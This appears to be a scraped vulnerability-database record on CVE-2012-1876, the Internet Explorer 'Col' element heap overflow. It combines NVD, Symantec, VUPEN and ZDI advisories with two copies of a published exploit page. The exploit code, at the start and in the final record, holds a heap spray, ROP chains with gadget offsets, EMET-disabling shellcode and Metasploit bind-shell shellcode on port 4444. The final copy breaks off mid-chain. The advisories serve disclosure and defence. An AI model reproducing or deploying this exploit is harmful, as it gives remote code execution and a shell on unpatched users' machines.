unescape(\"%u9090%u9090\"); // NOPs\r\n // Store various pointers here\r\n \r\n // EMET disable part 0x02 annihilate EAF/EAF+ by calling NtSetContextThread\r\n // MOV EAX,DWORD PTR DS:[076D10BCH]\r\n // MOV EAX,DWORD PTR DS:[007D25F48H]\r\n // MOV ESI,DWORD PTR [EAX+518H]\r\n // SUB ESP,2CCH\r\n // MOV DWORD PTR [ESP],10010H\r\n // MOV EDI,ESP\r\n // MOV ECX,2CCH\r\n // ADD EDI,4\r\n // SUB ECX,4\r\n // XOR EAX,EAX\r\n // REP STOS BYTE PTR ES:[EDI]\r\n // PUSH ESP\r\n // PUSH 0FFFFFFFEH\r\n // CALL ESI\r\n shellcode+= unescape(\"%u38a1%ud25f%u8b07%u18b0%u0005%u8100%uccec\" +\r\n \"%u0002%uc700%u2404%u0010%u0001%ufc8b%uccb9\" +\r\n \"%u0002%u8300%u04c7%ue983%u3304%uf3c0%u54aa\" +\r\n \"%ufe6a%ud6ff\");\r\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\r\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\r\n // EMET disable part 0x02 end\r\n \r\n // Bind shellcode on 4444 :)\r\n // msf > generate -t js_le\r\n // windows/shell_bind_tcp - 342 bytes\r\n // http://www.metasploit.com\r\n // VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,\r\n // EXITFUNC=process, InitialAutoRunScript=, AutoRunScript=\r\n // I would keep the shellcode the same size for better reliability :)\r\n \r\n shellcode+= unescape(\"%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b\" +\r\n \"%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a\" +\r\n \"%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf\" +\r\n \"%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001\" +\r\n \"%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18\" +\r\n \"%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31\" +\r\n \"%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03\" +\r\n \"%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66\" +\r\n \"%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489\" +\r\n \"%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a\" +\r\n \"%ueb12%u5d86%u3368%u0032%u6800%u7377%u5f32\" +\r\n \"%u6854%u774c%u0726%ud5ff%u90b8%u0001%u2900\" +\r\n \"%u54c4%u6850%u8029%u006b%ud5ff%u5050%u5050\" +\r\n \"%u5040%u5040%uea68%udf0f%uffe0%u89d5%u31c7\" +\r\n \"%u53db%u0268%u1100%u895c%u6ae6%u5610%u6857\" +\r\n \"%udbc2%u6737%ud5ff%u5753%ub768%u38e9%uffff\" +\r\n \"%u53d5%u5753%u7468%u3bec%uffe1%u57d5%uc789\" +\r\n \"%u7568%u4d6e%uff61%u68d5%u6d63%u0064%ue389\" +\r\n \"%u5757%u3157%u6af6%u5912%ue256%u66fd%u44c7\" +\r\n \"%u3c24%u0101%u448d%u1024%u00c6%u5444%u5650\" +\r\n \"%u5656%u5646%u564e%u5356%u6856%ucc79%u863f\" +\r\n \"%ud5ff%ue089%u564e%uff46%u6830%u8708%u601d\" +\r\n \"%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff\" +\r\n \"%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72\" +\r\n \"%u006a%uff53%u41d5\");\r\n \r\n // Total spray should be 1000\r\n var padding = unescape(\"%u9090\");\r\n while (padding.length < 1000)\r\n padding = padding + padding;\r\n var padding = padding.substr(0, 1000 - shellcode.length);\r\n \r\n shellcode+= padding;\r\n \r\n while (shellcode.length < 100000)\r\n shellcode = shellcode + shellcode;\r\n \r\n var onemeg = shellcode.substr(0, 64*1024/2);\r\n \r\n for (i=0; i<14; i++) {\r\n onemeg += shellcode.substr(0, 64*1024/2);\r\n }\r\n \r\n onemeg += shellcode.substr(0, (64*1024/2)-(38/2));\r\n \r\n var spray = new Array();\r\n \r\n for (i=0; i<100; i++) {\r\n spray[i] = onemeg.substr(0, onemeg.length);\r\n }\r\n}\r\n \r\nfunction leak(){\r\n var leak_col = document.getElementById(\"132\");\r\n leak_col.width = \"41\";\r\n leak_col.span = \"19\";\r\n}\r\n \r\nfunction get_leak() {\r\n var str_addr = strtoint(bl[498].substring((0x100-6)/2+11,(0x100-6)/2+13));\r\n str_addr = str_addr - 1410704;\r\n var hex = str_addr.toString(16);\r\n //alert(hex);\r\n setTimeout(function(){heapspray(str_addr)}, 50);\r\n}\r\n \r\nfunction trigger_overflow(){\r\n var evil_col = document.getElementById(\"132\");\r\n evil_col.width = \"1312272\"; // 0x07D25E40\r\n evil_col.span = \"44\";\r\n}\r\n \r\nsetTimeout(function(){leak()}, 400);\r\nsetTimeout(function(){get_leak()},450);\r\nsetTimeout(function(){trigger_overflow()}, 700);\r\n \r\n</script>\r\n</body>\r\n</html>\n\n# 0day.today [2018-02-17] #", "published": "2014-11-18T00:00:00", "references": [], "reporter": "ryujin", "modified": "2014-11-18T00:00:00", "href": "https://0day.today/exploit/description/22895"}
{"cve": [{"lastseen": "2021-02-02T05:59:47", "description": "Microsoft Internet Explorer 6 through 9, and 10 Consumer Preview, does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by attempting to access a nonexistent object, leading to a heap-based buffer overflow, aka \"Col Element Remote Code Execution Vulnerability,\" as demonstrated by VUPEN during a Pwn2Own competition at CanSecWest 2012.", "edition": 5, "cvss3": {}, "published": "2012-06-12T22:55:00", "title": "CVE-2012-1876", "type": "cve", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1876"], "modified": "2020-09-28T12:58:00", "cpe": ["cpe:/a:microsoft:ie:9", "cpe:/a:microsoft:ie:6", "cpe:/a:microsoft:ie:8", "cpe:/a:microsoft:ie:7"], "id": "CVE-2012-1876", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-1876", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:ie:9:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:ie:6:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:ie:8:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:ie:7:*:*:*:*:*:*:*"]}], "symantec": [{"lastseen": "2018-03-13T12:07:38", "bulletinFamily": "software", "cvelist": ["CVE-2012-1876"], "description": "### Description\n\nMicrosoft Internet Explorer is prone to a remote code-execution vulnerability. Attackers can exploit this issue to execute arbitrary code in the context of the currently logged-in user. Failed attacks will cause denial-of-service conditions.\n\n### Technologies Affected\n\n * Microsoft Internet Explorer 6.0 \n * Microsoft Internet Explorer 6.0 SP1 \n * Microsoft Internet Explorer 6.0 SP2 \n * Microsoft Internet Explorer 6.0 SP3 \n * Microsoft Internet Explorer 7.0 \n * Microsoft Internet Explorer 8 \n * Microsoft Internet Explorer 9 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits.\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Set web browser security to disable the execution of script code or active content.** \nSince a successful exploit of this issue requires malicious code to execute in web clients, consider disabling support for script code and active content within the client browser. Note that this mitigation tactic might adversely affect legitimate websites that rely on the execution of browser-based script code.\n\n**Implement multiple redundant layers of security.** \nMemory-protection schemes (such as nonexecutable stack and heap configurations and randomly mapped memory segments) will complicate exploits of memory-corruption vulnerabilities.\n\nThe vendor released an advisory along with fixes to address this issue. Please see the references for more information.\n", "modified": "2012-06-12T00:00:00", "published": "2012-06-12T00:00:00", "id": "SMNTC-53848", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/53848", "type": "symantec", "title": "Microsoft Internet Explorer CVE-2012-1876 Col Element Remote Code Execution Vulnerability", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:44", "bulletinFamily": "software", "cvelist": ["CVE-2012-1876"], "description": "VUPEN Security Research - Microsoft Internet Explorer "Col" Element \r\nRemote Heap Overflow (MS12-037 / CVE-2012-1876)\r\n\r\nWebsite : http://www.vupen.com/english/research.php\r\n\r\nTwitter : http://twitter.com/vupen\r\n\r\n\r\nI. BACKGROUND\r\n---------------------\r\n\r\n"Microsoft Internet Explorer is a web browser developed by Microsoft and\r\nincluded as part of the Microsoft Windows line of operating systems with\r\nmore than 60% of the worldwide usage share of web browsers." (Wikipedia)\r\n\r\n\r\nII. DESCRIPTION\r\n---------------------\r\n\r\nVUPEN Vulnerability Research Team discovered a critical vulnerability\r\nin Microsoft Internet Explorer.\r\n\r\nThe vulnerability is caused by a heap overflow error in the mshtml.dll\r\nmodule when processing "Col" elements, which could allow remote attackers\r\nto leak memory and execute arbitrary code despite ASLR and DEP.\r\n\r\nCVSS Score: 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C)\r\n\r\n\r\nIII. AFFECTED PRODUCTS\r\n---------------------------\r\n\r\nMicrosoft Internet Explorer 10\r\nMicrosoft Internet Explorer 9\r\nMicrosoft Internet Explorer 8\r\nMicrosoft Internet Explorer 7\r\nMicrosoft Internet Explorer 6\r\n\r\nMicrosoft Windows 8 for 32-bit Systems\r\nMicrosoft Windows 8 for x64-based Systems\r\nMicrosoft Windows 7 for 32-bit Systems\r\nMicrosoft Windows 7 for 32-bit Systems Service Pack 1\r\nMicrosoft Windows 7 for x64-based Systems\r\nMicrosoft Windows 7 for x64-based Systems Service Pack 1\r\nMicrosoft Windows Server 2008 for 32-bit Systems\r\nMicrosoft Windows Server 2008 for 32-bit Systems Service Pack 2\r\nMicrosoft Windows Server 2008 for x64-based Systems\r\nMicrosoft Windows Server 2008 for x64-based Systems Service Pack 2\r\nMicrosoft Windows Server 2008 for Itanium-based Systems\r\nMicrosoft Windows Server 2008 for Itanium-based Systems Service Pack 2\r\nMicrosoft Windows Server 2008 R2 for x64-based Systems\r\nMicrosoft Windows Server 2008 R2 for x64-based Systems Service Pack 1\r\nMicrosoft Windows Server 2008 R2 for Itanium-based Systems\r\nMicrosoft Windows Server 2008 R2 for Itanium-based Systems Service Pack 1\r\nMicrosoft Windows Vista Service Pack 1\r\nMicrosoft Windows Vista Service Pack 2\r\nMicrosoft Windows Vista x64 Edition Service Pack 1\r\nMicrosoft Windows Vista x64 Edition Service Pack 2\r\nMicrosoft Windows Server 2003 Service Pack 2\r\nMicrosoft Windows Server 2003 x64 Edition Service Pack 2\r\nMicrosoft Windows Server 2003 with SP2 for Itanium-based Systems\r\nMicrosoft Windows XP Service Pack 3\r\nMicrosoft Windows XP Professional x64 Edition Service Pack 2\r\n\r\n\r\nIV. Binary Analysis & Exploits/PoCs\r\n---------------------------------------\r\n\r\nIn-depth technical analysis of the vulnerability and a functional exploit\r\nincluding ASLR and DEP bypass are available through the VUPEN BAE\r\n(Binary Analysis & Exploits) portal:\r\n\r\nhttp://www.vupen.com/english/services/ba-index.php\r\n\r\nVUPEN Binary Analysis & Exploits Service provides private exploits and\r\nin-depth technical analysis of the most significant public vulnerabilities\r\nbased on disassembly, reverse engineering, protocol analysis, and code \r\naudit.\r\n\r\nThe service allows governments and major corporations to evaluate risks, and\r\nprotect infrastructures and assets against new threats. The service also\r\nallows security vendors (IPS, IDS, AntiVirus) to supplement their internal\r\nresearch efforts and quickly develop both vulnerability-based and\r\nexploit-based signatures to proactively protect their customers from attacks\r\nand emerging threats.\r\n\r\n\r\nV. VUPEN Threat Protection Program\r\n-----------------------------------\r\n\r\nGovernments and major corporations which are members of the VUPEN Threat\r\nProtection Program (TPP) have been proactively alerted about the \r\nvulnerability\r\nwhen it was discovered by VUPEN in advance of its public disclosure, and\r\nhave received a detailed attack detection guidance to protect national and\r\ncritical infrastructures against potential 0-day attacks exploiting this\r\nvulnerability:\r\n\r\nhttp://www.vupen.com/english/services/tpp-index.php\r\n\r\n\r\nVI. SOLUTION\r\n----------------\r\n\r\nApply MS12-037 security update.\r\n\r\n\r\nVII. CREDIT\r\n--------------\r\n\r\nThis vulnerability was discovered by Alexandre Pelletier of VUPEN Security\r\n\r\n\r\nVIII. ABOUT VUPEN Security\r\n---------------------------\r\n\r\nVUPEN is the leadering provider of advanced vulnerability research for\r\ndefensive and offensive cyber security. VUPEN solutions enable corporations\r\nand governments to measure and manage risks, eliminate vulnerabilities\r\nbefore they can be exploited, and protect critical infrastructures and\r\nassets against known and unknown vulnerabilities.\r\n\r\nVUPEN has been recognized as "Company of the Year 2011 in the Vulnerability\r\nResearch Market" by Frost & Sullivan.\r\n\r\nVUPEN has been recognized as "Company of the Year 2011 in the Vulnerability\r\nResearch Market" by Frost & Sullivan.\r\n\r\nVUPEN solutions include:\r\n\r\n* VUPEN Binary Analysis & Exploits Service (BAE) :\r\nhttp://www.vupen.com/english/services/ba-index.php\r\n\r\n* VUPEN Threat Protection Program (TPP) :\r\nhttp://www.vupen.com/english/services/tpp-index.php\r\n\r\n\r\nIX. REFERENCES\r\n----------------------\r\n\r\nhttp://technet.microsoft.com/en-us/security/bulletin/ms12-037\r\nhttp://www.vupen.com/english/research.php\r\n\r\n\r\nX. DISCLOSURE TIMELINE\r\n-----------------------------\r\n\r\n2012-02-02 - Vulnerability Discovered by VUPEN and used at Pwn2own\r\n2012-06-12 - Public disclosure\r\n", "edition": 1, "modified": "2012-06-25T00:00:00", "published": "2012-06-25T00:00:00", "id": "SECURITYVULNS:DOC:28204", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:28204", "title": "VUPEN Security Research - Microsoft Internet Explorer "Col" Element Remote Heap Overflow (MS12-037 / CVE-2012-1876)", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:44", "bulletinFamily": "software", "cvelist": ["CVE-2012-1876"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nZDI-12-093 : (Pwn2Own) Microsoft Internet Explorer Fixed Table Colspan\r\nRemote Code Execution Vulnerability\r\nhttp://www.zerodayinitiative.com/advisories/ZDI-12-093\r\nJune 12, 2012\r\n\r\n- -- CVE ID:\r\nCVE-2012-1876\r\n\r\n- -- CVSS:\r\n9, AV:N/AC:L/Au:N/C:P/I:P/A:C\r\n\r\n- -- Affected Vendors:\r\n\r\nMicrosoft\r\n\r\n- -- Affected Products:\r\n\r\nMicrosoft Internet Explorer\r\n\r\n- -- TippingPoint(TM) IPS Customer Protection:\r\nTippingPoint IPS customers have been protected against this\r\nvulnerability by Digital Vaccine protection filter ID 12380.\r\nFor further product information on the TippingPoint IPS, visit:\r\n\r\n http://www.tippingpoint.com\r\n\r\n- -- Vulnerability Details:\r\nThis vulnerability allows remote attackers to execute arbitrary code on\r\nvulnerable installations of Microsoft Internet Explorer. User interaction\r\nis required to exploit this vulnerability in that the target must visit a\r\nmalicious page or open a malicious file.\r\n\r\nThe specific flaw exists within the way Internet Explorer handles\r\ndynamically changed colspans on a column in a table with the\r\ntable-layout:fixed style. If the colspan is increased after initial\r\ncreation it will result in a heap overflow. This can lead to remote code\r\nexecution under the context of the current program.\r\n\r\n- -- Vendor Response:\r\n\r\nMicrosoft has issued an update to correct this vulnerability. More details\r\ncan be found at:\r\n\r\nhttp://www.microsoft.com/technet/security/bulletin/MS12-037.mspx\r\n\r\n\r\n- -- Disclosure Timeline:\r\n2012-03-14 - Vulnerability reported to vendor\r\n\r\n2012-06-12 - Coordinated public release of advisory\r\n\r\n- -- Credit:\r\nThis vulnerability was discovered by:\r\n\r\n* VUPEN Vulnerability Research Team http://www.vupen.com\r\n\r\n\r\n- -- About the Zero Day Initiative (ZDI):\r\nEstablished by TippingPoint, The Zero Day Initiative (ZDI) represents \r\na best-of-breed model for rewarding security researchers for responsibly\r\ndisclosing discovered vulnerabilities.\r\n\r\nResearchers interested in getting paid for their security research\r\nthrough the ZDI can find more information and sign-up at:\r\n\r\n http://www.zerodayinitiative.com\r\n\r\nThe ZDI is unique in how the acquired vulnerability information is\r\nused. TippingPoint does not re-sell the vulnerability details or any\r\nexploit code. Instead, upon notifying the affected product vendor,\r\nTippingPoint provides its customers with zero day protection through\r\nits intrusion prevention technology. Explicit details regarding the\r\nspecifics of the vulnerability are not exposed to any parties until\r\nan official vendor patch is publicly available. Furthermore, with the\r\naltruistic aim of helping to secure a broader user base, TippingPoint\r\nprovides this vulnerability information confidentially to security\r\nvendors (including competitors) who have a vulnerability protection or\r\nmitigation product.\r\n\r\nOur vulnerability disclosure policy is available online at:\r\n\r\n http://www.zerodayinitiative.com/advisories/disclosure_policy/\r\n\r\nFollow the ZDI on Twitter:\r\n\r\n http://twitter.com/thezdi\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: PGP Desktop 10.2.0 (Build 1950)\r\nCharset: utf-8\r\n\r\nwsBVAwUBT9eb7FVtgMGTo1scAQKNTwgApmw+usQ6/yMLe/mW84cS02tPb3WWxedh\r\nYsnzwiULe1YnuuEMYrEgXPDJbZkIp9OljLd6nYSIcAgdCUxck6XvBjqQmy82J1gT\r\nCLiB2nkStM0nPV0cGmbtBdmD/l2enasbBNv46AuKVP5CcwvngBuGxyTZIij0QDrS\r\n0vdKQql8lG6roQGkcUW6yad8NKmT9zIwlp75UQxMP8WY3yr4XJ0wDPXQoHzh9A2F\r\nP8vbSQBGvd6wHPbfHogphIAYCJpczOV/3Jfj7XVgzZWVscoPC8i8q/GKXyN9J13D\r\nixmmhexOplov43549zMZ6Esl3zUW17cNBCPr06a6FHdABz4piCz1DQ==\r\n=YxaL\r\n-----END PGP SIGNATURE-----\r\n", "edition": 1, "modified": "2012-06-17T00:00:00", "published": "2012-06-17T00:00:00", "id": "SECURITYVULNS:DOC:28155", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:28155", "title": "ZDI-12-093 : (Pwn2Own) Microsoft Internet Explorer Fixed Table Colspan Remote Code Execution Vulnerability", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:47", "bulletinFamily": "software", "cvelist": ["CVE-2012-1876", "CVE-2012-1875", "CVE-2012-1880", "CVE-2012-1872", "CVE-2012-1881", "CVE-2012-1858", "CVE-2012-1878", "CVE-2012-1523", "CVE-2012-1882", "CVE-2012-1879", "CVE-2012-1874", "CVE-2012-1873", "CVE-2012-1877"], "description": "Multiple memory corruptions, code executions, information leakage.", "edition": 1, "modified": "2012-06-25T00:00:00", "published": "2012-06-25T00:00:00", "id": "SECURITYVULNS:VULN:12404", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:12404", "title": "Microsoft Internet Explorer multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "zdt": [{"lastseen": "2018-01-03T21:05:36", "description": "Exploit for windows platform in category remote exploits", "edition": 2, "published": "2014-07-01T00:00:00", "type": "zdt", "title": "Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 4.1.X Bypass", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-1876"], "modified": "2014-07-01T00:00:00", "id": "1337DAY-ID-22396", "href": "https://0day.today/exploit/description/22396", "sourceData": "<!--\r\n** Internet Explorer 8 Fixed Col Span ID full ASLR, DEP and EMET 4.1.X bypass\r\n** Offensive Security Research Team\r\n** http://www.offensive-security.com/vulndev/disarming-enhanced-mitigation-experience-toolkit-emet\r\n** Affected Software: Internet Explorer 8\r\n** Vulnerability: Fixed Col Span ID\r\n** CVE: CVE-2012-1876\r\n** Tested on Windows 7 (x86) - IE 8.0.7601.17514 & EMET 4.1.X\r\n-->\r\n \r\n<html>\r\n<body>\r\n<div id=\"evil\"></div>\r\n<table style=\"table-layout:fixed\" ><col id=\"132\" width=\"41\" span=\"9\" > </col></table>\r\n<script language='javascript'>\r\n \r\nfunction strtoint(str) {\r\n return str.charCodeAt(1)*0x10000 + str.charCodeAt(0);\r\n}\r\n \r\nvar free = \"EEEE\";\r\nwhile ( free.length < 500 ) free += free;\r\n \r\nvar string1 = \"AAAA\";\r\nwhile ( string1.length < 500 ) string1 += string1;\r\n \r\nvar string2 = \"BBBB\";\r\nwhile ( string2.length < 500 ) string2 += string2;\r\n \r\nvar fr = new Array();\r\nvar al = new Array();\r\nvar bl = new Array();\r\n \r\nvar div_container = document.getElementById(\"evil\");\r\ndiv_container.style.cssText = \"display:none\";\r\n \r\nfor (var i=0; i < 500; i+=2) {\r\n fr[i] = free.substring(0, (0x100-6)/2);\r\n al[i] = string1.substring(0, (0x100-6)/2);\r\n bl[i] = string2.substring(0, (0x100-6)/2);\r\n var obj = document.createElement(\"button\");\r\n div_container.appendChild(obj);\r\n}\r\n \r\nfor (var i=200; i<500; i+=2 ) {\r\n fr[i] = null;\r\n CollectGarbage();\r\n}\r\n \r\nfunction heapspray(cbuttonlayout) {\r\n CollectGarbage();\r\n var rop = cbuttonlayout + 4161; // RET\r\n var rop = rop.toString(16);\r\n var rop1 = rop.substring(4,8);\r\n var rop2 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 11360; // POP EBP\r\n var rop = rop.toString(16);\r\n var rop3 = rop.substring(4,8);\r\n var rop4 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 111675; // XCHG EAX,ESP\r\n var rop = rop.toString(16);\r\n var rop5 = rop.substring(4,8);\r\n var rop6 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 12377; // POP EBX\r\n var rop = rop.toString(16);\r\n var rop7 = rop.substring(4,8);\r\n var rop8 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 642768; // POP EDX\r\n var rop = rop.toString(16);\r\n var rop9 = rop.substring(4,8);\r\n var rop10 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 12201; // POP ECX --> Changed\r\n var rop = rop.toString(16);\r\n var rop11 = rop.substring(4,8);\r\n var rop12 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 5504544; // Writable location\r\n var rop = rop.toString(16);\r\n var writable1 = rop.substring(4,8);\r\n var writable2 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 12462; // POP EDI\r\n var rop = rop.toString(16);\r\n var rop13 = rop.substring(4,8);\r\n var rop14 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 12043; // POP ESI --> changed\r\n var rop = rop.toString(16);\r\n var rop15 = rop.substring(4,8);\r\n var rop16 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 63776; // JMP EAX\r\n var rop = rop.toString(16);\r\n var jmpeax1 = rop.substring(4,8);\r\n var jmpeax2 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 85751; // POP EAX\r\n var rop = rop.toString(16);\r\n var rop17 = rop.substring(4,8);\r\n var rop18 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 4936; // VirtualProtect()\r\n var rop = rop.toString(16);\r\n var vp1 = rop.substring(4,8);\r\n var vp2 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 454843; // MOV EAX,DWORD PTR DS:[EAX]\r\n var rop = rop.toString(16);\r\n var rop19 = rop.substring(4,8);\r\n var rop20 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 234657; // PUSHAD\r\n var rop = rop.toString(16);\r\n var rop21 = rop.substring(4,8);\r\n var rop22 = rop.substring(0,4); // } RET\r\n \r\n \r\n var rop = cbuttonlayout + 408958; // PUSH ESP\r\n var rop = rop.toString(16);\r\n var rop23 = rop.substring(4,8);\r\n var rop24 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 2228408; // POP ECX\r\n var rop = rop.toString(16);\r\n var rop25 = rop.substring(4,8);\r\n var rop26 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 1586172; // POP EAX\r\n var rop = rop.toString(16);\r\n var rop27 = rop.substring(4,8);\r\n var rop28 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 1589179; // MOV EAX,DWORD PTR [EAX]\r\n var rop = rop.toString(16);\r\n var rop29 = rop.substring(4,8);\r\n var rop30 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 1884912; // PUSH EAX\r\n var rop = rop.toString(16);\r\n var rop31 = rop.substring(4,8);\r\n var rop32 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 2140694; // ADD EAX,ECX\r\n var rop = rop.toString(16);\r\n var rop33 = rop.substring(4,8);\r\n var rop34 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 2364867; // MOV DWORD PTR [EAX],ECX\r\n var rop = rop.toString(16);\r\n var rop35 = rop.substring(4,8);\r\n var rop36 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 5036248; // ADD ESP,0C\r\n var rop = rop.toString(16);\r\n var rop37 = rop.substring(4,8);\r\n var rop38 = rop.substring(0,4); // } RET\r\n \r\n var getmodulew = cbuttonlayout + 4840; // GetModuleHandleW\r\n var getmodulew = getmodulew.toString(16);\r\n var getmodulew1 = getmodulew.substring(4,8);\r\n var getmodulew2 = getmodulew.substring(0,4); // } RET\r\n \r\n var getprocaddr = cbuttonlayout + 4836; // GetProcAddress\r\n var getprocaddr = getprocaddr.toString(16);\r\n var getprocaddr1 = getprocaddr.substring(4,8);\r\n var getprocaddr2 = getprocaddr.substring(0,4); // } RET\r\n \r\n var shellcode = unescape(\"%u4141%u4141%u4242%u4242%u4343%u4343\"); // PADDING\r\n shellcode+= unescape(\"%u4141%u4141%u4242%u4242%u4343%u4343\"); // PADDING\r\n shellcode+= unescape(\"%u4141%u4141\"); // PADDING\r\n \r\n shellcode+= unescape(\"%u\"+rop1+\"%u\"+rop2); // RETN\r\n shellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP # RETN\r\n shellcode+= unescape(\"%u\"+rop5+\"%u\"+rop6); // XCHG EAX,ESP # RETN\r\n \r\n // EMET disable part 0x01\r\n // Implement the Tachyon detection grid to overcome the Romulan cloaking device.\r\n shellcode+= unescape(\"%u\"+rop25+\"%u\"+rop26); // POP ECX # RETN\r\n shellcode+= unescape(\"%u1024%u076d\"); // EMET string\r\n shellcode+= unescape(\"%u\"+rop27+\"%u\"+rop28); // POP EAX # RETN\r\n shellcode+= unescape(\"%u\"+getmodulew1+\"%u\"+getmodulew2); // GetModuleHandleW\r\n shellcode+= unescape(\"%u\"+rop29+\"%u\"+rop30); // MOV EAX,DWORD PTR [EAX] # RETN\r\n shellcode+= unescape(\"%u\"+rop31+\"%u\"+rop32); // PUSH EAX # RETN\r\n shellcode+= unescape(\"%u\"+rop25+\"%u\"+rop26); // POP ECX # RETN\r\n shellcode+= unescape(\"%u1024%u076d\"); // EMET string\r\n shellcode+= unescape(\"%ue220%u0007\"); // EMET offset\r\n shellcode+= unescape(\"%u\"+rop33+\"%u\"+rop34); // ADD EAX,ECX # RETN\r\n shellcode+= unescape(\"%u\"+rop25+\"%u\"+rop26); // POP ECX # RETN\r\n shellcode+= unescape(\"%u0000%u0000\"); // Zero out ECX\r\n shellcode+= unescape(\"%u\"+rop35+\"%u\"+rop36); // MOV DWORD PTR [EAX],ECX # RETN\r\n shellcode+= unescape(\"%u\"+rop37+\"%u\"+rop38); // ADD ESP,0C # RETN\r\n shellcode+= \"EMET\"; // EMET string\r\n shellcode+= unescape(\"%u0000%u0000\"); // EMET string\r\n // EMET disable part 0x01 end\r\n \r\n // Performing a standard Kumeh maneuver ... (VirtualProtect mona chain)\r\n shellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP\r\n shellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP\r\n shellcode+= unescape(\"%u\"+rop7+\"%u\"+rop8); // POP EBP\r\n shellcode+= unescape(\"%u1024%u0000\"); // Size 0x00001024\r\n shellcode+= unescape(\"%u\"+rop9+\"%u\"+rop10); // POP EDX\r\n shellcode+= unescape(\"%u0040%u0000\"); // 0x00000040\r\n shellcode+= unescape(\"%u\"+rop11+\"%u\"+rop12); // POP ECX\r\n shellcode+= unescape(\"%u\"+writable1+\"%u\"+writable2); // Writable Location\r\n shellcode+= 